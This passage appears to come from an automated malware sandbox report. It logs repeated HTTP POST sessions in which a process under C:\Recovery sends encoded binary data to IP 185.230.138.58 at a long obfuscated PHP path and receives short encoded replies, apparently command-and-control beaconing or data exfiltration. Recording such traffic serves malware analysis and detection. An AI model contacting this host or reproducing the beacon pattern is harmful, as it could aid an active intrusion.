                                                                                                                                        Data Ascii: WQZ]ZCQR[YQVY^XPV\]XZ[[G[VBZT^Y]\[Q^_YR^GUUQUR_EWTY]ARTZR]WZQYZ^PW\Z_]RZ]_\X[T_VVX]SQAZZS\X]\^\T]VFRWT]_Z[GX[QXWXGTUZU]S_]X[[]Y]\Z[QT]XZ]X_VPW\SZ\P^P[Q[Z]X\[]UW\Q\XTWPVT_P^XZVUFXZT^^UX"/!/4,<%<*[9#.*[)//1>))7S'=?''X3'^& X/8
                                                                                                                                        Dec 21, 2024 10:07:39.968101978 CET25INHTTP/1.1 100 Continue
                                                                                                                                        Dec 21, 2024 10:07:40.200128078 CET200INHTTP/1.1 200 OK
                                                                                                                                        Server: nginx
                                                                                                                                        Date: Sat, 21 Dec 2024 09:07:39 GMT
                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                        Connection: keep-alive
                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                        Data Raw: 34 0d 0a 33 57 5c 54 0d 0a 30 0d 0a 0d 0a
                                                                                                                                        Data Ascii: 43W\T0


                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                        14192.168.2.449755185.230.138.58806268C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe
                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                        Dec 21, 2024 10:07:40.444222927 CET425OUTPOST /video7/Dle/publicupdate/4/GeneratorgeneratorDump/_Async/Flower/asyncSecure52/6Public5/VoiddbJs7/better/temporaryUploads/8/04providerTemporary/TempwpsecureVoiddb/Longpoll7ProtonPrivate/PhpUpdateSqlDatalife.php HTTP/1.1
                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                                                        Host: 185.230.138.58
                                                                                                                                        Content-Length: 1012
                                                                                                                                        Expect: 100-continue
                                                                                                                                        Dec 21, 2024 10:07:40.795053959 CET1012OUTData Raw: 57 5f 5f 5c 5a 43 51 50 5b 59 51 56 59 59 58 5c 56 58 5d 56 5a 5c 5b 43 5b 56 42 5a 54 5e 59 5d 5c 5b 51 5e 5f 59 52 5e 47 55 55 51 55 52 5f 45 57 54 59 5d 41 52 54 5a 52 5d 57 5a 51 59 5a 5e 50 57 5c 5a 5f 5d 52 5a 5d 5f 5c 58 5b 54 5f 56 56 58
                                                                                                                                        Data Ascii: W__\ZCQP[YQVYYX\VX]VZ\[C[VBZT^Y]\[Q^_YR^GUUQUR_EWTY]ARTZR]WZQYZ^PW\Z_]RZ]_\X[T_VVX]SQAZZS\X]\^\T]VFRWT]_Z[GX[QXWXGTUZU]S_]X[[]Y]\Z[QT]XZ]X_VPW\SZ\P^P[Q[Z]X\[]UW\Q\XTWPVT_P^XZVUFXZT^^UX!F/28]#/(1,%=-6 X9)<\%()*<0$\&76Y'*'^& X/$
                                                                                                                                        Dec 21, 2024 10:07:41.700805902 CET25INHTTP/1.1 100 Continue
                                                                                                                                        Dec 21, 2024 10:07:41.940274000 CET200INHTTP/1.1 200 OK
                                                                                                                                        Server: nginx
                                                                                                                                        Date: Sat, 21 Dec 2024 09:07:41 GMT
                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                        Connection: keep-alive
                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                        Data Raw: 34 0d 0a 33 57 5c 54 0d 0a 30 0d 0a 0d 0a
                                                                                                                                        Data Ascii: 43W\T0


                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                        15192.168.2.449756185.230.138.58806268C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe
                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                        Dec 21, 2024 10:07:42.188704967 CET425OUTPOST /video7/Dle/publicupdate/4/GeneratorgeneratorDump/_Async/Flower/asyncSecure52/6Public5/VoiddbJs7/better/temporaryUploads/8/04providerTemporary/TempwpsecureVoiddb/Longpoll7ProtonPrivate/PhpUpdateSqlDatalife.php HTTP/1.1
                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                                                        Host: 185.230.138.58
                                                                                                                                        Content-Length: 1012
                                                                                                                                        Expect: 100-continue
                                                                                                                                        Dec 21, 2024 10:07:42.545149088 CET1012OUTData Raw: 57 50 5f 5a 5f 42 51 5e 5b 59 51 56 59 52 58 51 56 5e 5d 5a 5a 5b 5b 44 5b 56 42 5a 54 5e 59 5d 5c 5b 51 5e 5f 59 52 5e 47 55 55 51 55 52 5f 45 57 54 59 5d 41 52 54 5a 52 5d 57 5a 51 59 5a 5e 50 57 5c 5a 5f 5d 52 5a 5d 5f 5c 58 5b 54 5f 56 56 58
                                                                                                                                        Data Ascii: WP_Z_BQ^[YQVYRXQV^]ZZ[[D[VBZT^Y]\[Q^_YR^GUUQUR_EWTY]ARTZR]WZQYZ^PW\Z_]RZ]_\X[T_VVX]SQAZZS\X]\^\T]VFRWT]_Z[GX[QXWXGTUZU]S_]X[[]Y]\Z[QT]XZ]X_VPW\SZ\P^P[Q[Z]X\[]UW\Q\XTWPVT_P^XZVUFXZT^^UX!B;2 Y4??^1<Z*.5">\)<Y2;%?3S'>8X34)'*'^& X/
                                                                                                                                        Dec 21, 2024 10:07:43.433625937 CET25INHTTP/1.1 100 Continue
                                                                                                                                        Dec 21, 2024 10:07:43.668401003 CET200INHTTP/1.1 200 OK
                                                                                                                                        Server: nginx
                                                                                                                                        Date: Sat, 21 Dec 2024 09:07:43 GMT
                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                        Connection: keep-alive
                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                        Data Raw: 34 0d 0a 33 57 5c 54 0d 0a 30 0d 0a 0d 0a
                                                                                                                                        Data Ascii: 43W\T0


                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                        16192.168.2.449757185.230.138.58806268C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe
                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                        Dec 21, 2024 10:07:43.911874056 CET449OUTPOST /video7/Dle/publicupdate/4/GeneratorgeneratorDump/_Async/Flower/asyncSecure52/6Public5/VoiddbJs7/better/temporaryUploads/8/04providerTemporary/TempwpsecureVoiddb/Longpoll7ProtonPrivate/PhpUpdateSqlDatalife.php HTTP/1.1
                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                                                        Host: 185.230.138.58
                                                                                                                                        Content-Length: 1012
                                                                                                                                        Expect: 100-continue
                                                                                                                                        Connection: Keep-Alive
                                                                                                                                        Dec 21, 2024 10:07:44.263776064 CET1012OUTData Raw: 52 52 5f 50 5a 42 54 51 5b 59 51 56 59 5d 58 5b 56 59 5d 57 5a 5f 5b 43 5b 56 42 5a 54 5e 59 5d 5c 5b 51 5e 5f 59 52 5e 47 55 55 51 55 52 5f 45 57 54 59 5d 41 52 54 5a 52 5d 57 5a 51 59 5a 5e 50 57 5c 5a 5f 5d 52 5a 5d 5f 5c 58 5b 54 5f 56 56 58
                                                                                                                                        Data Ascii: RR_PZBTQ[YQVY]X[VY]WZ_[C[VBZT^Y]\[Q^_YR^GUUQUR_EWTY]ARTZR]WZQYZ^PW\Z_]RZ]_\X[T_VVX]SQAZZS\X]\^\T]VFRWT]_Z[GX[QXWXGTUZU]S_]X[[]Y]\Z[QT]XZ]X_VPW\SZ\P^P[Q[Z]X\[]UW\Q\XTWPVT_P^XZVUFXZT^^UX",<X ,?%?*Z(.)">Z=?;%5+&./33:'^& X/
                                                                                                                                        Dec 21, 2024 10:07:45.159116030 CET25INHTTP/1.1 100 Continue
                                                                                                                                        Dec 21, 2024 10:07:45.396410942 CET200INHTTP/1.1 200 OK
                                                                                                                                        Server: nginx
                                                                                                                                        Date: Sat, 21 Dec 2024 09:07:44 GMT
                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                        Connection: keep-alive
                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                        Data Raw: 34 0d 0a 33 57 5c 54 0d 0a 30 0d 0a 0d 0a
                                                                                                                                        Data Ascii: 43W\T0


                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                        17192.168.2.449758185.230.138.58806268C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe
                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                        Dec 21, 2024 10:07:45.629961967 CET449OUTPOST /video7/Dle/publicupdate/4/GeneratorgeneratorDump/_Async/Flower/asyncSecure52/6Public5/VoiddbJs7/better/temporaryUploads/8/04providerTemporary/TempwpsecureVoiddb/Longpoll7ProtonPrivate/PhpUpdateSqlDatalife.php HTTP/1.1
                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                                                        Host: 185.230.138.58
                                                                                                                                        Content-Length: 1012
                                                                                                                                        Expect: 100-continue
                                                                                                                                        Connection: Keep-Alive
                                                                                                                                        Dec 21, 2024 10:07:45.982625961 CET1012OUTData Raw: 52 53 5f 51 5f 44 54 52 5b 59 51 56 59 59 58 59 56 59 5d 5a 5a 5f 5b 43 5b 56 42 5a 54 5e 59 5d 5c 5b 51 5e 5f 59 52 5e 47 55 55 51 55 52 5f 45 57 54 59 5d 41 52 54 5a 52 5d 57 5a 51 59 5a 5e 50 57 5c 5a 5f 5d 52 5a 5d 5f 5c 58 5b 54 5f 56 56 58
                                                                                                                                        Data Ascii: RS_Q_DTR[YQVYYXYVY]ZZ_[C[VBZT^Y]\[Q^_YR^GUUQUR_EWTY]ARTZR]WZQYZ^PW\Z_]RZ]_\X[T_VVX]SQAZZS\X]\^\T]VFRWT]_Z[GX[QXWXGTUZU]S_]X[[]Y]\Z[QT]XZ]X_VPW\SZ\P^P[Q[Z]X\[]UW\Q\XTWPVT_P^XZVUFXZT^^UX!F/2$_ <1<=)5 :)?%;6<403"^3*'^& X/$


                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                        18192.168.2.449759185.230.138.58806268C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe
                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                        Dec 21, 2024 10:07:46.556866884 CET449OUTPOST /video7/Dle/publicupdate/4/GeneratorgeneratorDump/_Async/Flower/asyncSecure52/6Public5/VoiddbJs7/better/temporaryUploads/8/04providerTemporary/TempwpsecureVoiddb/Longpoll7ProtonPrivate/PhpUpdateSqlDatalife.php HTTP/1.1
                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                                                        Host: 185.230.138.58
                                                                                                                                        Content-Length: 1892
                                                                                                                                        Expect: 100-continue
                                                                                                                                        Connection: Keep-Alive
                                                                                                                                        Dec 21, 2024 10:07:46.904452085 CET1892OUTData Raw: 52 53 5f 5a 5f 42 51 56 5b 59 51 56 59 5b 58 5c 56 5d 5d 5e 5a 59 5b 47 5b 56 42 5a 54 5e 59 5d 5c 5b 51 5e 5f 59 52 5e 47 55 55 51 55 52 5f 45 57 54 59 5d 41 52 54 5a 52 5d 57 5a 51 59 5a 5e 50 57 5c 5a 5f 5d 52 5a 5d 5f 5c 58 5b 54 5f 56 56 58
                                                                                                                                        Data Ascii: RS_Z_BQV[YQVY[X\V]]^ZY[G[VBZT^Y]\[Q^_YR^GUUQUR_EWTY]ARTZR]WZQYZ^PW\Z_]RZ]_\X[T_VVX]SQAZZS\X]\^\T]VFRWT]_Z[GX[QXWXGTUZU]S_]X[[]Y]\Z[QT]XZ]X_VPW\SZ\P^P[Q[Z]X\[]UW\Q\XTWPVT_P^XZVUFXZT^^UX!C-2,^7<8&Z>[(.9 .)<%;&?#','':0'^& X/,
                                                                                                                                        Dec 21, 2024 10:07:47.799607038 CET25INHTTP/1.1 100 Continue
                                                                                                                                        Dec 21, 2024 10:07:48.036298990 CET349INHTTP/1.1 200 OK
                                                                                                                                        Server: nginx
                                                                                                                                        Date: Sat, 21 Dec 2024 09:07:47 GMT
                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                        Connection: keep-alive
                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                        Data Raw: 39 38 0d 0a 01 1f 26 05 22 36 2b 52 31 5b 30 0c 24 3e 08 5b 28 3d 3f 5d 26 3f 2d 0a 34 55 37 06 2a 11 2f 5c 30 3e 0b 05 27 3f 2b 0c 3c 23 34 00 2c 20 20 46 04 1c 23 15 3d 30 29 0a 3d 38 2c 1b 2f 38 00 01 28 1c 21 06 22 5a 32 04 34 3e 08 5b 34 1f 35 51 3c 07 32 15 2a 0a 30 13 39 3d 2e 13 36 00 23 56 0b 1f 3a 0d 2a 20 08 5b 27 09 33 07 32 24 2d 0e 21 35 28 08 21 32 3c 0d 22 03 0d 5c 25 5e 3e 5c 36 01 3f 0e 3e 01 08 5e 25 17 2c 55 3a 07 26 52 20 0c 29 50 05 35 57 52 0d 0a 30 0d 0a 0d 0a
                                                                                                                                        Data Ascii: 98&"6+R1[0$>[(=?]&?-4U7*/\0>'?+<#4, F#=0)=8,/8(!"Z24>[45Q<2*09=.6#V:* ['32$-!5(!2<"\%^>\6?>^%,U:&R )P5WR0


                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                        19192.168.2.449760185.230.138.58806268C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe
                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                        Dec 21, 2024 10:07:46.681505919 CET449OUTPOST /video7/Dle/publicupdate/4/GeneratorgeneratorDump/_Async/Flower/asyncSecure52/6Public5/VoiddbJs7/better/temporaryUploads/8/04providerTemporary/TempwpsecureVoiddb/Longpoll7ProtonPrivate/PhpUpdateSqlDatalife.php HTTP/1.1
                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                                                        Host: 185.230.138.58
                                                                                                                                        Content-Length: 1012
                                                                                                                                        Expect: 100-continue
                                                                                                                                        Connection: Keep-Alive
                                                                                                                                        Dec 21, 2024 10:07:47.029506922 CET1012OUTData Raw: 52 54 5a 5a 5f 48 54 54 5b 59 51 56 59 5b 58 5e 56 52 5d 5b 5a 5f 5b 48 5b 56 42 5a 54 5e 59 5d 5c 5b 51 5e 5f 59 52 5e 47 55 55 51 55 52 5f 45 57 54 59 5d 41 52 54 5a 52 5d 57 5a 51 59 5a 5e 50 57 5c 5a 5f 5d 52 5a 5d 5f 5c 58 5b 54 5f 56 56 58
                                                                                                                                        Data Ascii: RTZZ_HTT[YQVY[X^VR][Z_[H[VBZT^Y]\[Q^_YR^GUUQUR_EWTY]ARTZR]WZQYZ^PW\Z_]RZ]_\X[T_VVX]SQAZZS\X]\^\T]VFRWT]_Z[GX[QXWXGTUZU]S_]X[[]Y]\Z[QT]XZ]X_VPW\SZ\P^P[Q[Z]X\[]UW\Q\XTWPVT_P^XZVUFXZT^^UX"-" #Z+Z1/)>=#-")?1%Y<9&.,$='*'^& X/,
                                                                                                                                        Dec 21, 2024 10:07:47.926356077 CET25INHTTP/1.1 100 Continue
                                                                                                                                        Dec 21, 2024 10:07:48.163228035 CET200INHTTP/1.1 200 OK
                                                                                                                                        Server: nginx
                                                                                                                                        Date: Sat, 21 Dec 2024 09:07:47 GMT
                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                        Connection: keep-alive
                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                        Data Raw: 34 0d 0a 33 57 5c 54 0d 0a 30 0d 0a 0d 0a
                                                                                                                                        Data Ascii: 43W\T0


                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                        20192.168.2.449761185.230.138.58806268C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe
                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                        Dec 21, 2024 10:07:48.403841972 CET425OUTPOST /video7/Dle/publicupdate/4/GeneratorgeneratorDump/_Async/Flower/asyncSecure52/6Public5/VoiddbJs7/better/temporaryUploads/8/04providerTemporary/TempwpsecureVoiddb/Longpoll7ProtonPrivate/PhpUpdateSqlDatalife.php HTTP/1.1
                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                                                        Host: 185.230.138.58
                                                                                                                                        Content-Length: 1012
                                                                                                                                        Expect: 100-continue
                                                                                                                                        Dec 21, 2024 10:07:48.748302937 CET1012OUTData Raw: 57 50 5f 58 5f 47 51 5e 5b 59 51 56 59 5f 58 5c 56 5d 5d 5a 5a 5a 5b 42 5b 56 42 5a 54 5e 59 5d 5c 5b 51 5e 5f 59 52 5e 47 55 55 51 55 52 5f 45 57 54 59 5d 41 52 54 5a 52 5d 57 5a 51 59 5a 5e 50 57 5c 5a 5f 5d 52 5a 5d 5f 5c 58 5b 54 5f 56 56 58
                                                                                                                                        Data Ascii: WP_X_GQ^[YQVY_X\V]]ZZZ[B[VBZT^Y]\[Q^_YR^GUUQUR_EWTY]ARTZR]WZQYZ^PW\Z_]RZ]_\X[T_VVX]SQAZZS\X]\^\T]VFRWT]_Z[GX[QXWXGTUZU]S_]X[[]Y]\Z[QT]XZ]X_VPW\SZ\P^P[Q[Z]X\[]UW\Q\XTWPVT_P^XZVUFXZT^^UX!-!<X7<4%<_>#=!=<<18Y(*($X0&_3:'^& X/<
                                                                                                                                        Dec 21, 2024 10:07:49.650067091 CET25INHTTP/1.1 100 Continue
                                                                                                                                        Dec 21, 2024 10:07:49.884233952 CET200INHTTP/1.1 200 OK
                                                                                                                                        Server: nginx
                                                                                                                                        Date: Sat, 21 Dec 2024 09:07:49 GMT
                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                        Connection: keep-alive
                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                        Data Raw: 34 0d 0a 33 57 5c 54 0d 0a 30 0d 0a 0d 0a
                                                                                                                                        Data Ascii: 43W\T0


                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                        21192.168.2.449762185.230.138.58806268C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe
                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                        Dec 21, 2024 10:07:50.136981010 CET449OUTPOST /video7/Dle/publicupdate/4/GeneratorgeneratorDump/_Async/Flower/asyncSecure52/6Public5/VoiddbJs7/better/temporaryUploads/8/04providerTemporary/TempwpsecureVoiddb/Longpoll7ProtonPrivate/PhpUpdateSqlDatalife.php HTTP/1.1
                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                                                        Host: 185.230.138.58
                                                                                                                                        Content-Length: 1012
                                                                                                                                        Expect: 100-continue
                                                                                                                                        Connection: Keep-Alive
                                                                                                                                        Dec 21, 2024 10:07:50.482744932 CET1012OUTData Raw: 57 54 5a 5f 5a 45 51 5e 5b 59 51 56 59 5b 58 5d 56 5c 5d 57 5a 5f 5b 48 5b 56 42 5a 54 5e 59 5d 5c 5b 51 5e 5f 59 52 5e 47 55 55 51 55 52 5f 45 57 54 59 5d 41 52 54 5a 52 5d 57 5a 51 59 5a 5e 50 57 5c 5a 5f 5d 52 5a 5d 5f 5c 58 5b 54 5f 56 56 58
                                                                                                                                        Data Ascii: WTZ_ZEQ^[YQVY[X]V\]WZ_[H[VBZT^Y]\[Q^_YR^GUUQUR_EWTY]ARTZR]WZQYZ^PW\Z_]RZ]_\X[T_VVX]SQAZZS\X]\^\T]VFRWT]_Z[GX[QXWXGTUZU]S_]X[[]Y]\Z[QT]XZ]X_VPW\SZ\P^P[Q[Z]X\[]UW\Q\XTWPVT_P^XZVUFXZT^^UX!/!3 ,+[25).%"=!)4&+%?$$.\'4>\':'^& X/,
                                                                                                                                        Dec 21, 2024 10:07:51.385217905 CET25INHTTP/1.1 100 Continue
                                                                                                                                        Dec 21, 2024 10:07:51.621867895 CET200INHTTP/1.1 200 OK
                                                                                                                                        Server: nginx
                                                                                                                                        Date: Sat, 21 Dec 2024 09:07:51 GMT
                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                        Connection: keep-alive
                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                        Data Raw: 34 0d 0a 33 57 5c 54 0d 0a 30 0d 0a 0d 0a
                                                                                                                                        Data Ascii: 43W\T0


                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                        22192.168.2.449763185.230.138.58806268C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe
                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                        Dec 21, 2024 10:07:51.869218111 CET449OUTPOST /video7/Dle/publicupdate/4/GeneratorgeneratorDump/_Async/Flower/asyncSecure52/6Public5/VoiddbJs7/better/temporaryUploads/8/04providerTemporary/TempwpsecureVoiddb/Longpoll7ProtonPrivate/PhpUpdateSqlDatalife.php HTTP/1.1
                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                                                        Host: 185.230.138.58
                                                                                                                                        Content-Length: 1012
                                                                                                                                        Expect: 100-continue
                                                                                                                                        Connection: Keep-Alive
                                                                                                                                        Dec 21, 2024 10:07:52.216969013 CET1012OUTData Raw: 57 52 5a 58 5a 42 51 57 5b 59 51 56 59 59 58 59 56 5f 5d 5f 5a 5a 5b 40 5b 56 42 5a 54 5e 59 5d 5c 5b 51 5e 5f 59 52 5e 47 55 55 51 55 52 5f 45 57 54 59 5d 41 52 54 5a 52 5d 57 5a 51 59 5a 5e 50 57 5c 5a 5f 5d 52 5a 5d 5f 5c 58 5b 54 5f 56 56 58
                                                                                                                                        Data Ascii: WRZXZBQW[YQVYYXYV_]_ZZ[@[VBZT^Y]\[Q^_YR^GUUQUR_EWTY]ARTZR]WZQYZ^PW\Z_]RZ]_\X[T_VVX]SQAZZS\X]\^\T]VFRWT]_Z[GX[QXWXGTUZU]S_]X[[]Y]\Z[QT]XZ]X_VPW\SZ\P^P[Q[Z]X\[]UW\Q\XTWPVT_P^XZVUFXZT^^UX"//!,<%,:*7>*^),\%+W000-$'^& X/$
                                                                                                                                        Dec 21, 2024 10:07:53.117249012 CET25INHTTP/1.1 100 Continue


                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                        23192.168.2.449764185.230.138.58806268C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe
                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                        Dec 21, 2024 10:07:53.165584087 CET449OUTPOST /video7/Dle/publicupdate/4/GeneratorgeneratorDump/_Async/Flower/asyncSecure52/6Public5/VoiddbJs7/better/temporaryUploads/8/04providerTemporary/TempwpsecureVoiddb/Longpoll7ProtonPrivate/PhpUpdateSqlDatalife.php HTTP/1.1
                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                                                        Host: 185.230.138.58
                                                                                                                                        Content-Length: 1892
                                                                                                                                        Expect: 100-continue
                                                                                                                                        Connection: Keep-Alive
                                                                                                                                        Dec 21, 2024 10:07:53.513854027 CET1892OUTData Raw: 57 51 5a 5f 5a 43 51 52 5b 59 51 56 59 5b 58 58 56 53 5d 59 5a 5b 5b 49 5b 56 42 5a 54 5e 59 5d 5c 5b 51 5e 5f 59 52 5e 47 55 55 51 55 52 5f 45 57 54 59 5d 41 52 54 5a 52 5d 57 5a 51 59 5a 5e 50 57 5c 5a 5f 5d 52 5a 5d 5f 5c 58 5b 54 5f 56 56 58
                                                                                                                                        Data Ascii: WQZ_ZCQR[YQVY[XXVS]YZ[[I[VBZT^Y]\[Q^_YR^GUUQUR_EWTY]ARTZR]WZQYZ^PW\Z_]RZ]_\X[T_VVX]SQAZZS\X]\^\T]VFRWT]_Z[GX[QXWXGTUZU]S_]X[[]Y]\Z[QT]XZ]X_VPW\SZ\P^P[Q[Z]X\[]UW\Q\XTWPVT_P^XZVUFXZT^^UX!,8]4<#_1<.*)7>Z+?72+:(+0X/''0'^& X/,
                                                                                                                                        Dec 21, 2024 10:07:54.434003115 CET25INHTTP/1.1 100 Continue
                                                                                                                                        Dec 21, 2024 10:07:54.672300100 CET349INHTTP/1.1 200 OK
                                                                                                                                        Server: nginx
                                                                                                                                        Date: Sat, 21 Dec 2024 09:07:54 GMT
                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                        Connection: keep-alive
                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                        Data Raw: 39 38 0d 0a 01 1f 26 04 36 36 38 0f 26 2e 37 57 33 3e 3a 1f 3c 3e 0a 02 33 02 31 0a 37 20 37 05 3e 11 30 01 33 3e 3e 5e 27 2c 27 0e 2b 20 0e 00 39 20 20 46 04 1c 23 14 3f 20 2a 14 3e 06 30 16 38 38 07 5a 3f 32 21 07 22 2c 21 5c 34 3e 39 04 37 32 21 18 3c 3a 2e 56 2a 1a 01 03 2d 10 3a 10 22 2a 23 56 0b 1f 39 52 3d 0e 0f 06 24 19 34 5f 27 37 22 57 20 08 3b 52 21 0c 3c 0c 21 2d 0d 5d 27 2b 3d 05 21 06 24 1e 29 59 31 07 24 39 3f 0e 3a 17 26 52 20 0c 29 50 05 35 57 52 0d 0a 30 0d 0a 0d 0a
                                                                                                                                        Data Ascii: 98&668&.7W3>:<>317 7>03>>^','+ 9 F#? *>088Z?2!",!\4>972!<:.V*-:"*#V9R=$4_'7"W ;R!<!-]'+=!$)Y1$9?:&R )P5WR0


                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                        24192.168.2.449765185.230.138.58806268C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe
                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                        Dec 21, 2024 10:07:53.287297010 CET449OUTPOST /video7/Dle/publicupdate/4/GeneratorgeneratorDump/_Async/Flower/asyncSecure52/6Public5/VoiddbJs7/better/temporaryUploads/8/04providerTemporary/TempwpsecureVoiddb/Longpoll7ProtonPrivate/PhpUpdateSqlDatalife.php HTTP/1.1
                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                                                                                        Host: 185.230.138.58
                                                                                                                                        Content-Length: 1012
                                                                                                                                        Expect: 100-continue
                                                                                                                                        Connection: Keep-Alive
                                                                                                                                        Dec 21, 2024 10:07:53.638837099 CET1012OUTData Raw: 57 5f 5a 5f 5f 48 51 5e 5b 59 51 56 59 52 58 5b 56 59 5d 5c 5a 50 5b 48 5b 56 42 5a 54 5e 59 5d 5c 5b 51 5e 5f 59 52 5e 47 55 55 51 55 52 5f 45 57 54 59 5d 41 52 54 5a 52 5d 57 5a 51 59 5a 5e 50 57 5c 5a 5f 5d 52 5a 5d 5f 5c 58 5b 54 5f 56 56 58
                                                                                                                                        Data Ascii: W_Z__HQ^[YQVYRX[VY]\ZP[H[VBZT^Y]\[Q^_YR^GUUQUR_EWTY]ARTZR]WZQYZ^PW\Z_]RZ]_\X[T_VVX]SQAZZS\X]\^\T]VFRWT]_Z[GX[QXWXGTUZU]S_]X[[]Y]\Z[QT]XZ]X_VPW\SZ\P^P[Q[Z]X\[]UW\Q\XTWPVT_P^XZVUFXZT^^UX!A/"'!/7[1?*[*2V -6=?<Y'(&?_#3,09$'^& X/
                                                                                                                                        Dec 21, 2024 10:07:54.596649885 CET25INHTTP/1.1 100 Continue
                                                                                                                                        Dec 21, 2024 10:07:54.832571030 CET200INHTTP/1.1 200 OK
                                                                                                                                        Server: nginx
                                                                                                                                        Date: Sat, 21 Dec 2024 09:07:54 GMT
                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                        Connection: keep-alive
                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                        Data Raw: 34 0d 0a 33 57 5c 54 0d 0a 30 0d 0a 0d 0a
                                                                                                                                        Data Ascii: 43W\T0


                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                        25192.168.2.449766185.230.138.58806268C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe
                                                                                                                                        TimestampBytes transferredDirectionData
